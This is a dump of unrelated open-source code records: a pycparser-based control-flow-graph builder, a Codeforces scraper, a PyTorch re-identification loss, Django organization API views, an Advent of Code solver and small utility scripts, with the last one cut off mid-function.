self.stack[-1]\n\ndef construct_CFG_help(p: pycparser.c_ast.Node, pre: str, goto_dict: Dict[str, GotoManager], returns: Set[CFGNode], stack_break: BreakManager) -> Optional[ControlFlowGraph]:\n def process_function(p: pycparser.c_ast.Node, pre: str) -> Optional[ControlFlowGraph]:\n if is_ignoring_function_name(p.name):\n return None\n elif p.name == \"main\":\n if type(p) is pycparser.c_ast.FuncDef:\n fd: pycparser.c_ast.FuncDef = cast(pycparser.c_ast.FuncDef, p)\n if type(fd.body) is pycparser.c_ast.Compound:\n comp: pycparser.c_ast.Compound = fd.body\n cfgs = [construct_CFG_help(c, pre, goto_dict, returns, stack_break) for c in comp.block_items]\n return join_CFGs(cfgs, goto_dict, returns)\n else:\n assert False\n else:\n raise Exception(\"Unexcepted type for main\")\n return None\n else:\n raise Exception(f\"Unexpected function definition {p.name}\")\n # cfg = ControlFlowGraph()\n if type(p) is pycparser.c_ast.FileAST:\n cs = [c[1] for c in p.children()]\n cfgs = [construct_CFG_help(c, pre, goto_dict, 
returns, stack_break) for c in cs]\n return join_CFGs(cfgs, goto_dict, returns)\n elif type(p) is pycparser.c_ast.FuncDef:\n fd: pycparser.c_ast.FuncDef = cast(pycparser.c_ast.FuncDef, p)\n logging.debug(f\"FuncDef {fd.decl.name}\")\n if fd.decl.name == \"main\":\n if type(fd.body) is pycparser.c_ast.Compound:\n if hasattr(fd.decl.type.args, \"params\"):\n decls = [construct_CFG_help(d, pre, goto_dict, returns, stack_break) for d in fd.decl.type.args.params]\n else:\n decls = []\n comp: pycparser.c_ast.Compound = fd.body\n cfgs = [construct_CFG_help(c, pre, goto_dict, returns, stack_break) for c in comp.block_items]\n return join_CFGs(decls + cfgs, goto_dict, returns)\n elif is_ignoring_function_name(fd.decl.name):\n return None\n raise Exception(\"Unexpected Function Definition/\" + str(p))\n # return process_function(fd, pre)\n elif type(p) is pycparser.c_ast.Decl:\n d: pycparser.c_ast.Decl = p\n if type(d.type) is pycparser.c_ast.FuncDecl:\n logging.debug(f\"Decl/FuncDecl {d.name}\")\n return process_function(d, pre)\n elif type(d.type) is pycparser.c_ast.TypeDecl:\n logging.debug(f\"Decl/TypeDecl {d.name}\")\n cfg = ControlFlowGraph()\n if d.init is None:\n typename = d.type.type.names[0]\n if typename == \"int\":\n # var = CFGVar(pre + \"*nondetint\", \"int\") # TODO: Is it needed?\n # cfg.vars.add(var)\n val = CFGValue((\"NondetInt\", ))\n # val = CFGValue((\"Constant\", \"0\", \"int\"))\n elif typename == \"unsigned\":\n val = CFGValue((\"NondetUnsigned\", ))\n else:\n raise Exception(\"Unexpected type name\")\n else:\n val = parse_exp(d.init, pre)\n var = CFGVar(pre + d.name, d.type.type.names[0])\n cfg.vars.add(var)\n ex = cfg.add_edge(cfg.initial, None, CFGValue(), OperationBin(var.name, val, \"=\"))\n cfg.exit = ex[1]\n return cfg\n else:\n raise Exception(\"Unexpected type of declaration/\" + str(d))\n elif type(p) is pycparser.c_ast.While:\n logging.debug(\"While\")\n w: pycparser.c_ast.While = p\n label_break = stack_break.push()\n gm = GotoManager()\n goto_dict[label_break] = gm\n cond = parse_exp(w.cond, pre) # Here assignment cannot come here\n body_cfg = construct_CFG_help(w.stmt, pre, goto_dict, returns, stack_break)\n stack_break.pop()\n body_cfg = body_cfg if body_cfg is not None else ControlFlowGraph()\n if cond.val[0] == \"Nondet\":\n cond_in = CFGValue()\n cond_out = CFGValue()\n else:\n cond_in = cond\n cond_out = CFGValue((\"Unary\", \"!\", cond))\n cfg = ControlFlowGraph()\n exit_node = cfg.add_edge(cfg.initial, None, cond_out, None)[1] # from branching to exit\n gm.target = exit_node\n branch_node = cfg.initial\n cfg = join_CFG(cfg, body_cfg, branch_node, body_cfg.initial, cond_in, goto_dict, returns) #from branching to main\n cfg.add_edge(cfg.exit, branch_node, CFGValue(), None) # from the bottom to top\n cfg.exit = exit_node\n return cfg\n elif type(p) is pycparser.c_ast.If:\n logging.debug(\"If\")\n i: pycparser.c_ast.If = p\n cond = parse_exp(i.cond, pre)\n if cond.val[0] == \"Nondet\":\n cond_if = CFGValue()\n cond_else = CFGValue()\n else:\n cond_if = cond\n cond_else = CFGValue((\"Unary\", \"!\", cond))\n if_cfg = construct_CFG_help(i.iftrue, pre, goto_dict, returns, stack_break)\n if_cfg = if_cfg if if_cfg is not None else ControlFlowGraph()\n cfg = ControlFlowGraph()\n branch_node = cfg.initial\n cfg = join_CFG(cfg, if_cfg, branch_node, if_cfg.initial, cond_if, goto_dict, returns)\n if cfg.final == cfg.exit:\n if_dying = True\n else:\n if_dying = False\n exit_node = cfg.add_edge(cfg.exit, None, CFGValue(), None)[1]\n cfg.exit = exit_node\n if i.iffalse 
is None:\n if if_dying:\n exit_node = cfg.add_edge(branch_node, None, cond_else, None)[1]\n cfg.exit = exit_node\n else:\n cfg.add_edge(branch_node, exit_node, cond_else, None)\n else:\n else_cfg = construct_CFG_help(i.iffalse, pre, goto_dict, returns, stack_break)\n else_cfg = else_cfg if else_cfg is not None else ControlFlowGraph()\n cfg = join_CFG(cfg, else_cfg, branch_node, else_cfg.initial, cond_else, goto_dict, returns)\n if if_dying:\n if else_cfg.final == else_cfg.exit:\n cfg.exit = cfg.final\n else:\n exit_node = cfg.add_edge(cfg.exit, None, CFGValue(), None)[1]\n cfg.exit = exit_node\n else:\n cfg.add_edge(cfg.exit, exit_node, CFGValue(), None)\n cfg.exit = exit_node\n return cfg\n elif type(p) is pycparser.c_ast.Assignment:\n a: pycparser.c_ast.Assignment = p\n logging.debug(f\"Assigning {a.lvalue.name}\")\n varname = pre + a.lvalue.name\n val = parse_exp(a.rvalue)\n cfg = ControlFlowGraph()\n ex = cfg.add_edge(cfg.initial, None, CFGValue(), OperationBin(varname, val, a.op))\n cfg.exit = ex[1]\n return cfg\n elif type(p) is pycparser.c_ast.FuncCall:\n fc: pycparser.c_ast.FuncCall = p\n logging.debug(f\"FuncCall {fc.name.name}\")\n if is_error_function(fc.name.name):\n cfg = ControlFlowGraph()\n cfg.add_edge(cfg.initial, cfg.final, CFGValue(), None)\n cfg.exit = cfg.final\n logging.log(logging.DEBUG, \"added edge\")\n return cfg\n elif is_assumption(fc.name.name):\n cond = parse_exp(fc.args.exprs[0], pre)\n cfg = ControlFlowGraph()\n ex = cfg.add_edge(cfg.initial, None, cond, None)\n cfg.exit = ex[1]\n return cfg\n elif is_assertion(fc.name.name):\n cond = parse_exp(fc.args.exprs[0], pre)\n cond_neg = CFGValue((\"Unary\", \"!\", cond))\n cfg = ControlFlowGraph()\n ex = cfg.add_edge(cfg.initial, None, cond, None)\n cfg.add_edge(cfg.initial, cfg.final, cond_neg, None)\n cfg.exit = ex[1]\n return cfg\n else:\n raise Exception(f\"Unexpected function call {fc.name}\")\n elif type(p) is pycparser.c_ast.Compound:\n comp = p\n if comp.block_items is None:\n return ControlFlowGraph()\n else:\n cfgs = [construct_CFG_help(b, pre, goto_dict, returns, stack_break) for b in comp.block_items]\n return join_CFGs(cfgs, goto_dict, returns)\n elif type(p) is pycparser.c_ast.Goto:\n cfg = ControlFlowGraph()\n if p.name not in goto_dict:\n goto_dict[p.name] = GotoManager()\n goto_dict[p.name].sources.add(cfg.initial)\n print(\"added source\", goto_dict[p.name], goto_dict[p.name].sources)\n return cfg\n elif type(p) is pycparser.c_ast.Label:\n name = p.name\n stmt = p.stmt\n\n cfg_main = construct_CFG_help(stmt, pre, goto_dict, returns, stack_break)\n if name not in goto_dict:\n goto_dict[name] = GotoManager()\n goto_dict[name].target = cfg_main.initial\n\n return cfg_main\n elif type(p) is pycparser.c_ast.Return:\n c = ControlFlowGraph()\n returns.add(c.initial)\n return c # TODO: it can be fixed when it needs subproceedure\n elif type(p) is pycparser.c_ast.UnaryOp:\n cfg = ControlFlowGraph()\n varname = p.expr.name\n ex = cfg.add_edge(cfg.initial, None, CFGValue(), OperationUni(varname, p.op))\n cfg.exit = ex[1]\n return cfg\n elif type(p) is pycparser.c_ast.For:\n init = construct_CFG_help(p.init, pre, goto_dict, returns, stack_break)\n cond = parse_exp(p.cond, pre)\n cfg_next = construct_CFG_help(p.next, pre, goto_dict, returns, stack_break)\n\n if cond.val[0] == \"Nondet\":\n cond_in = CFGValue()\n cond_out = CFGValue()\n else:\n cond_in = cond\n cond_out = CFGValue((\"Unary\", \"!\", cond))\n \n exit_node = init.add_edge(init.exit, None, cond_out, None)[1] # from branching to exit\n branch_node 
= init.exit\n label_break = stack_break.push()\n gm = GotoManager()\n gm.target = exit_node\n goto_dict[label_break] = gm\n body_cfg = construct_CFG_help(p.stmt, pre, goto_dict, returns, stack_break)\n stack_break.pop()\n body_cfg = join_CFG(body_cfg, cfg_next, body_cfg.exit, cfg_next.initial, CFGValue(), goto_dict, returns)\n # body_cfg.add_edge(body_cfg.exit, body_cfg.initial, CFGValue(), None)\n cfg = join_CFG(init, body_cfg, branch_node, body_cfg.initial, cond_in, goto_dict, returns) #from branching to main\n cfg.add_edge(cfg.exit, branch_node, CFGValue(), None) # from the bottom to top\n cfg.exit = exit_node\n return cfg\n elif type(p) is pycparser.c_ast.EmptyStatement \\\n or p is None \\\n or (type(p) is pycparser.c_ast.Typename and p.name is None):\n return ControlFlowGraph()\n elif type(p) is pycparser.c_ast.Break:\n cfg = ControlFlowGraph()\n goto_dict[stack_break.get_top()].sources.add(cfg.initial)\n print(\"added source (break)\", goto_dict[stack_break.get_top()], goto_dict[stack_break.get_top()].sources)\n return cfg\n else:\n raise Exception(\"Unexpected type \" + str(p))\n raise Exception(\"Forgot returning somewhere\")\n\ndef connect_goto(res, goto_dict):\n for k, v in goto_dict.items():\n print(k, v.sources, v.target)\n assert v.target in res.nodes\n for s in v.sources:\n assert s in res.nodes\n edges = s.going\n while len(edges) > 0:\n e = next(edges.__iter__())\n res.remove_edge(e)\n if k == \"ERROR\":\n tgt = res.final\n else:\n tgt = v.target\n res.add_edge(s, tgt, CFGValue(), None)\n return res\n\ndef connect_returns(res, returns):\n for r in returns:\n assert r in res.nodes\n edges = r.going\n while len(edges) > 0:\n e = next(edges.__iter__())\n res.remove_edge(e)\n if r != res.exit and r != res.final:\n res.add_edge(r, res.exit, CFGValue(), None)\n return res\n\ndef construct_CFG(p: pycparser.c_ast.Node, mode: str, bitwidth: int, pre: str = \"\") -> ControlFlowGraph:\n goto_dict = {}\n returns = set()\n stack_break = BreakManager()\n res = construct_CFG_help(p, pre, goto_dict, returns, stack_break)\n returns.add(res.final)\n print(\"returns\", returns)\n res = connect_returns(res, returns)\n res = connect_goto(res, goto_dict)\n print(\"goto_dict:\", goto_dict)\n if res is None:\n assert False\n else:\n res.make_predicates(mode, bitwidth)\n return res\n\n\ndef main():\n # x = pycparser.parse_file(sys.argv[1])\n if len(sys.argv) > 1:\n x = pycparser.parse_file(sys.argv[1])\n else:\n x = pycparser.parse_file(\"01xx.c\")\n\n \n\n # with open(sys.argv[1]) as f:\n # text = f.read()\n # print(text)\n \n # parser = c_parser.CParser()\n # ast = parser.parse(text)\n\n # print(dir(ast))\n # print(ast)\n x.show()\n cfg = construct_CFG(x)\n cfg.print()\n\n cfg._check_consistency()\n\nif __name__ == \"__main__\":\n main()","repo_name":"ERATOMMSD/mind_the_gap","sub_path":"experiment/CFG.py","file_name":"CFG.py","file_ext":"py","file_size_in_byte":35844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2385307554","text":"import time as tsleep\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport os\nimport random as rd\ndroppedLinks = []\nqpages = []\nfor i in range(1,33):\t#Get all pages which contain problems\n\tqpages.append(\"http://codeforces.com/problemset/page/\" + str(i))\n\nf = open(\"questions.csv\",'w') #Write to this file\n#Headings of the csv file.\nf.write(\"Problem ID\"+\",\"+\"Problem Name\"+\",\"+\"Title Tags\"+\",\"+\"Plain Tags,\"+\"Number Solved\"+\"\\n\")\nfor qpage in 
qpages:\n\ttry : \n\t\tpage = urlopen(qpage)\n\t\ttsleep.sleep(3)\n\texcept Exception:\n\t\tqpages.append(qpage)\n\t\tcontinue\n\tsoup = BeautifulSoup(page)\n\ttable = soup.find_all('table',attrs={\"class\":\"problems\"})[0]\n\trows = table.find_all('tr')[1:]\n\tprint(qpage)\n\tfor row in rows:\n\t\tcols = row.find_all('td')\n\t\tpid = cols[0].get_text().strip()\n\t\tpname,tags = cols[1].find_all('div')\n\t\t\n\t\tpname = \"\".join(pname.get_text().strip().split(\",\"))\n\t\ttags = tags.find_all('a')\n\t\tnum = cols[3].get_text().strip()[1:]\n\t\tkeytags = []\n\t\tplaintags = []\n\t\tfor i in tags:\n\t\t\tplaintags.append(\"\".join(i.get_text().strip().split(\",\")))\n\t\t\tthetag = \"\".join(i['title'].split(\",\"))\n\t\t\tkeytags.append(thetag)\n\t\t\t#print(i['title'])\n\t\tkt = \"|\".join(keytags)\t#Adding the key tags with separator |\n\t\tpt = \"|\".join(plaintags) #Adding the title plain tags with separator |\n\t\t\n\t\tf.write(pid+\",\"+pname+\",\"+kt+\",\"+pt+\",\"+num+\"\\n\")\n","repo_name":"chittaranjan19/competitive-coding-analysis","sub_path":"Scripts/Scraping/questionScrape.py","file_name":"questionScrape.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29922189267","text":"from __future__ import absolute_import\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn, autograd\nimport numpy as np\n\n\nclass Exclusive(autograd.Function):\n def __init__(self, M):\n super(Exclusive, self).__init__()\n self.M = M\n\n def forward(self, inputs, index,positive_index):\n self.save_for_backward(inputs, index,positive_index)\n\n N = inputs.size(0)\n K= index.size(1)\n\n logits = torch.zeros(N,K).to(inputs.device)\n for i in range(N):\n logits[i] = inputs[i:i + 1].mm(self.M[index[i]].t())\n #logits=inputs.mm(self.M.t())\n return logits\n\n def backward(self, grad_outputs):\n inputs, index, positive_index = self.saved_tensors\n N,C=inputs.size()\n grad_inputs=torch.zeros(N,C).to(inputs.device)\n\n for i in range(N):\n grad_inputs[i] = grad_outputs[i:i + 1].mm(self.M[index[i]])\n\n\n # print(targets)\n for x, y in zip(inputs, positive_index):\n self.M[y] = F.normalize((self.M[y] + x) / 2, p=2, dim=0)\n\n return grad_inputs, None, None\n\n\n\n\nclass ExLoss(nn.Module):\n def __init__(self, num_features, num_classes, t=1.0,\n weight=None):\n super(ExLoss, self).__init__()\n self.num_features = num_features\n self.num_classes = num_classes\n self.t = t\n self.weight = weight\n self.index_list = np.arange(num_classes)\n\n self.register_buffer('M', torch.zeros(num_classes, num_features))\n\n def forward(self, inputs, positive_index,negative_index, cof):\n\n index_list=torch.cat((positive_index,negative_index),dim=1)\n\n\n loss = 0\n N,K=positive_index.size()\n\n for j in range(positive_index.size(1)):\n logits=Exclusive(self.M)(inputs,index_list,index_list[:,j])*self.t\n loss += cof[j] * F.cross_entropy(logits, j + torch.zeros(N, dtype=torch.int64).to(device=inputs.device),\n weight=self.weight)\n #loss += cof[j] * F.cross_entropy(logits, targets[:,j],weight=self.weight)\n return loss, logits\n\n\n\n\ndef loss_fn(criterion, inputs,positive_index,negative_index, lambda_t, positive_num, alpha):\n\n cof = np.zeros(positive_num+1)\n cof[0] = lambda_t\n cof[1:] = alpha * (1 - lambda_t) / positive_num\n loss, outputs = criterion(inputs, positive_index,negative_index, cof)\n\n\n return loss, 
outputs\n","repo_name":"pangbo1997/Unsup_ReID","sub_path":"engine/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5059934203","text":"from utils import format_attribute\nfrom class_components import ClassComponent, BaseComponent, SpellComponent, SorcererComponent, BardComponent\n\n\ndef class_factory(**kwargs):\n name = kwargs.get(\"name\", \"\")\n\n if name == \"Sorcerer\":\n return Sorcerer(**kwargs)\n elif name == \"Bard\":\n return Bard(**kwargs)\n else:\n return DefaultClass(**kwargs)\n\n\nclass Class(object):\n def __init__(self, components):\n self.abilities = []\n self.attributes = []\n\n for component in components:\n if not isinstance(component, ClassComponent):\n raise TypeError(\"invalid compenent type\")\n\n self.abilities += component.get_abilities()\n self.attributes += component.get_attributes()\n\n for attr, label in self.attributes:\n setattr(self, label, attr)\n\n def __str__(self):\n class_str = \"|----- {} ({}) -----|\\n\".format(self.name, self.level)\n\n for data, label in self.abilities:\n if len(data) < 1:\n continue\n\n class_str += label + '\\n'\n for datum in data:\n class_str += format_attribute(datum['name'],\n datum['description'])\n\n return class_str\n\n def to_dict(self):\n attr_dict = {}\n\n for attr, label in self.attributes:\n attr_dict[label] = attr\n\n return attr_dict\n\n\nclass DefaultClass(Class):\n def __init__(self, **kwargs):\n components = [\n BaseComponent(**kwargs)\n ]\n\n super().__init__(components)\n\n\nclass Sorcerer(Class):\n def __init__(self, **kwargs):\n components = [\n BaseComponent(**kwargs),\n SpellComponent(**kwargs),\n SorcererComponent(**kwargs)\n ]\n\n super().__init__(components)\n\n\nclass Bard(Class):\n def __init__(self, **kwargs):\n components = [\n BaseComponent(**kwargs),\n SpellComponent(**kwargs),\n BardComponent(**kwargs)\n ]\n super().__init__(components)\n","repo_name":"williamh890/pynd","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8484632462","text":"from typing import Sized\nfrom unittest import TestCase as TC\n\n\nclass TestCase(TC):\n '''\n TestCase extension class\n '''\n\n def assertLen(self, expected: int, lst: Sized, msg: str = ''):\n length = len(lst)\n if length != expected:\n message = f'{length} != {expected}'\n if msg != '':\n message += f' {msg}'\n\n raise AssertionError(message)\n","repo_name":"elegos/python-blessedui","sub_path":"tests/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18186445501","text":"import os\nimport tempfile\nimport argparse\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--key', nargs='?')\nparser.add_argument('--value', nargs='?')\ndata = parser.parse_args()\n\nstorage_path = os.path.join(tempfile.gettempdir(), 'storage.data')\nif os.path.exists(storage_path)== False :\n with open(storage_path, 'w') as f:\n f.write('')\n\nwith open(storage_path, 'r+') as f:\n context = f.read()\n storage = {}\n if context !='':\n storage = json.loads(context)\n if(data.value != None and data.key in storage):\n storage[data.key] = \"{}, {}\".format(storage[data.key],data.value)\n if (data.value != None and data.key not in storage):\n storage[data.key] 
= data.value\n if (data.value == None and data.key in storage):\n print(storage[data.key])\n if (data.value == None and data.key not in storage):\n print('None')\n\n json_data = json.dumps(storage)\n f.seek(0)\n f.write(json_data)\n f.truncate()\n\n","repo_name":"eriixon/pythonBegins","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69997770065","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom django.db.models import Q\nfrom django.db import connection\n\nfrom app.helper_functions import get_user_id\n\nfrom .models import Organizations, AreasCatered\nfrom .serializers import OrganizationsSerializer, AreasCateredSerializer\n\nclass OrganizatonView(APIView):\n\n def post(self, request):\n token = request.headers.get('Authorization', None)\n if token is None or token==\"\":\n connection.close()\n return Response({\"message\":\"Authorization credentials missing\"}, status=status.HTTP_403_FORBIDDEN)\n \n payload = get_user_id(token)\n if payload['_id'] is None:\n connection.close()\n return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n print(request.data)\n org_data = {}\n org_data['name'] = request.data.get(\"name\", None)\n org_data['city'] = request.data.get(\"city\", None)\n org_data['state'] = request.data.get(\"state\", None)\n org_data['country'] = request.data.get(\"country\", None)\n org_data['description'] = request.data.get(\"description\", None)\n org_data['email'] = request.data.get(\"email\", None)\n org_data['phone_no'] = request.data.get(\"phone_no\", None)\n org_data['address'] = request.data.get(\"address\", None)\n org_data['other_contact'] = request.data.get(\"other_contact\", None)\n org_data['web_links'] = request.data.get(\"web_links\", None)\n \n areas_catered = request.data.get(\"areas_catered\", None)\n if areas_catered==None or len(areas_catered)==0:\n connection.close()\n return Response({\"message\":\"Please provide Areas catered\"}, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = OrganizationsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n print(serializer.data['id'])\n for area in areas_catered:\n area['org_id'] = serializer.data['id']\n area_serializer = AreasCateredSerializer(data=area)\n if area_serializer.is_valid():\n area_serializer.save()\n else:\n print(area_serializer.errors)\n\n connection.close()\n return Response({\"message\":\"Organization Saved\", \"organization\":serializer.data}, status=status.HTTP_201_CREATED)\n\n else:\n connection.close()\n return Response({\"message\":serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, pk):\n token = request.headers.get('Authorization', None)\n if token is None or token==\"\":\n connection.close()\n return Response({\"message\":\"Authorization credentials missing\"}, status=status.HTTP_403_FORBIDDEN)\n \n payload = get_user_id(token)\n if payload['_id'] is None:\n connection.close()\n return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n try:\n org = Organizations.objects.get(id=pk)\n serializer = OrganizationsSerializer(org)\n serializer = serializer.data\n areas = AreasCatered.objects.filter(org_id=pk)\n areas_serializer = AreasCateredSerializer(areas, many=True)\n serializer['areas_catered'] = 
areas_serializer.data\n            connection.close()\n            return Response({\"message\":\"Organization Found\", \"Organization\":serializer}, status=status.HTTP_200_OK)\n        except Organizations.DoesNotExist:\n            connection.close()\n            return Response({\"message\":\"Organization Does Not Exist\"}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserViewOrganization(APIView):\n\n    def get(self, request):\n        token = request.headers.get('Authorization', None)\n        if token is None or token==\"\":\n            connection.close()\n            return Response({\"message\":\"Authorization credentials missing\"}, status=status.HTTP_403_FORBIDDEN)\n\n        city = request.query_params.get(\"city\", None)\n        state = request.query_params.get(\"state\", None)\n        country = request.query_params.get(\"country\", None)\n        \n        payload = get_user_id(token)\n        if payload['_id'] is None:\n            connection.close()\n            return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n        orgs = Organizations.objects.all()\n        result = []\n        for org in orgs:\n            if org.is_verified:\n                serializer = OrganizationsSerializer(org)\n                serializer = serializer.data\n                areas = AreasCatered.objects.filter(org_id=org.id)\n                areas_serializer = AreasCateredSerializer(areas, many=True)\n                serializer['areas_catered'] = areas_serializer.data\n                result.append(serializer)\n\n        field = None\n        field_value = None\n\n        if city!=None and city!=\"\":\n            field = 'city'\n            field_value = city.lower()\n        elif state!=None and state!=\"\":\n            field = 'state'\n            field_value = state.lower()\n        elif country!=None and country!=\"\":\n            field = 'country'\n            field_value = country.lower()\n\n        to_remove = []\n\n        if field!=None:\n            for org in result:\n                areas = org['areas_catered']\n                should_remove = True\n                for area in areas: \n                    if field_value==(area[field].lower()):\n                        should_remove = False\n                if should_remove:\n                    to_remove.append(org)\n\n            for item in to_remove:\n                result.remove(item)\n\n        key = 1\n        for item in result:\n            item['key'] = key\n            key += 1\n        \n        if len(result)==0:\n            connection.close()\n            return Response({\"message\":\"Organizations not found\"}, status=status.HTTP_204_NO_CONTENT)\n\n        connection.close()\n        return Response({\"message\":\"Organizations found\", \"Organization\":result}, status=status.HTTP_200_OK)\n\nclass AdminOrganizationView(APIView):\n\n    def get(self, request):\n        token = request.headers.get('Authorization', None)\n        if token is None or token==\"\":\n            connection.close()\n            return Response({\"message\":\"Authorization credentials missing\"}, status=status.HTTP_403_FORBIDDEN)\n        \n        payload = get_user_id(token)\n        if payload['_id'] is None:\n            connection.close()\n            return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n        orgs = Organizations.objects.all()\n        \n        if len(orgs)==0:\n            connection.close()\n            return Response({\"message\":\"No Organizations Found\"}, status=status.HTTP_204_NO_CONTENT)\n\n        serializer = OrganizationsSerializer(orgs, many=True)\n        serializer = serializer.data\n        key = 1\n        for item in serializer:\n            areas = AreasCatered.objects.filter(org_id=item['id'])\n            area_serializer = AreasCateredSerializer(areas, many=True)\n            item['areas_catered'] = area_serializer.data\n            item['key'] = key\n            key += 1\n        \n        connection.close()\n        return Response({\"message\":\"Organizations Found\", \"Organization\":serializer}, status=status.HTTP_200_OK)\n\nclass VerifyOrganizationView(APIView):\n\n    def get(self, request, pk):\n        token = request.headers.get('Authorization', None)\n        if token is None or token==\"\":\n            connection.close()\n            return Response({\"message\":\"Authorization credentials 
missing\"}, status=status.HTTP_403_FORBIDDEN)\n \n payload = get_user_id(token)\n if payload['_id'] is None:\n connection.close()\n return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n try:\n org = Organizations.objects.get(id=pk)\n org.is_verified = True\n org.save()\n connection.close()\n return Response({\"message\":\"Organization Verified\"}, status=status.HTTP_200_OK)\n except Organizations.DoesNotExist:\n connection.close()\n return Response({\"message\":\"Organization Does Not Exist\"}, status=status.HTTP_400_BAD_REQUEST)","repo_name":"AshDarkfold/akina-education-devhack","sub_path":"project/backend/hestia-requests/app/organizations_view.py","file_name":"organizations_view.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27734186383","text":"from collections import deque, OrderedDict\nfrom sys import maxsize, stdin\n\n\ndef parse_floor(line):\n items = []\n\n if ' contains a ' in line:\n _, line = line.split(' contains ')\n line = line[:-1].replace(', and ', ', ').replace(' and ', ', ')\n\n for part in line.split(', '):\n part = part[2:].replace('-compatible ', ' ')\n material, category = part.split()\n items.append((material, category))\n\n return items\n\n\ndef is_done(floors):\n return not any(floors[:-1])\n\n\ndef is_safe(items):\n generators = [m for m, c in items if c == 'generator']\n microchips = [m for m, c in items if c == 'microchip']\n return not generators or all(m in generators for m in microchips)\n\n\ndef generate_neighbors(source_floor, floors):\n target_floors = [\n i\n for i in [source_floor - 1, source_floor + 1]\n if 0 <= i < len(floors)\n ]\n\n source_items = floors[source_floor]\n item_lists = []\n\n for i, item in enumerate(source_items):\n item_lists.append([item])\n\n if len(source_items) >= 2:\n for j in range(i + 1, len(source_items)):\n item_lists.append([item, source_items[j]])\n\n for items in item_lists:\n new_source_items = [item for item in source_items if item not in items]\n\n if not is_safe(new_source_items):\n continue\n\n for target_floor in target_floors:\n new_target_items = floors[target_floor] + items\n\n if not is_safe(new_target_items):\n continue\n\n new_floors = list(floors)\n new_floors[source_floor] = new_source_items\n new_floors[target_floor] = new_target_items\n yield target_floor, new_floors\n\n\ndef to_key(floor, floors, materials, categories):\n for i, items in enumerate(floors):\n for material, category in items:\n j = materials[material]\n categories[category][j] = i\n\n return floor, tuple(sorted(zip(*categories.values())))\n\n\ndef main():\n floors = [parse_floor(line.strip()) for line in stdin]\n\n extra_items = [\n (material, category)\n for material in ('dilithium', 'elerium')\n for category in ('generator', 'microchip')\n ]\n\n floors[0] += extra_items\n\n materials = {}\n generators = []\n microchips = []\n categories = OrderedDict(generator=generators, microchip=microchips)\n\n for i, items in enumerate(floors):\n for material, category in items:\n if material not in materials:\n materials[material] = len(materials)\n generators.append(-1)\n microchips.append(-1)\n\n queue = deque([[0, 0, floors]])\n visited = set()\n\n while queue:\n step, floor, floors = queue.popleft()\n key = to_key(floor, floors, materials, categories)\n\n if key in visited:\n continue\n\n visited.add(key)\n\n if is_done(floors):\n print(step)\n return\n\n for new_floor, new_floors in 
generate_neighbors(floor, floors):\n queue.append([step + 1, new_floor, new_floors])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"elemel/advent-of-code","sub_path":"python/2016/day_11/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12792764219","text":"# This Python file uses the following encoding: utf-8\nfrom __future__ import division\nimport random, math\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n# from scipy.interpolate import spline\n# from sklearn.metrics import classification_report\n# from sklearn.metrics import accuracy_score\n\ndef dot(X, w):\n \"\"\"\n Função que soma o produto dos elementos de duas listas\n Parâmetro: X, w - entradas e pesos em formato de lista\n Retorna: soma dos produtos dos elementos de X por w\n \"\"\"\n return sum(X[i]*w[i] for i in range(len(X)))\n\ndef weight_init(input_size, num_hidden, output_size):\n \"\"\"\n Função que inicializa os pesos e bias aleatoriamente utilizando random\n Parâmetro: num_inputs - quantidade de entradas X\n num_hidden - quantidade de camadas ocultas\n Retorna: w,b - pesos e bias da rede inicializados\n \"\"\"\n # inicializa os pesos e bias para os neuronios da camada oculta\n random.seed(0)\n\n hidden_layer = [[random.random() for __ in range(input_size + 1)]\n for __ in range(num_hidden)]\n\n # inicializa os pesos e bias para os neuronios da camada de saída\n output_layer = [[random.random() for __ in range((num_hidden or input_size) + 1)]\n for __ in range(output_size)]\n\n return hidden_layer, output_layer\n\ndef activation_func(func_type, z):\n \"\"\"\n Função que implementa as funções de ativação mais comuns\n Parãmetros: func_type - uma string que contém a função de ativação desejada\n z - vetor com os valores de entrada X multiplicado pelos pesos\n Retorna: saída da função de ativação\n \"\"\"\n ### Seu código aqui (~2 linhas)\n if func_type == 'sigmoid':\n return 1 / (1 + math.exp(-z))\n elif func_type == 'tanh':\n return math.tanh(z)\n elif func_type == 'relu':\n return max(0, z)\n elif func_type == 'degrau':\n return 0 if z < 0 else 1 if z > 0 else 0.5\n elif func_type == 'signum':\n return -1 if z < 0 else 1 if z > 0 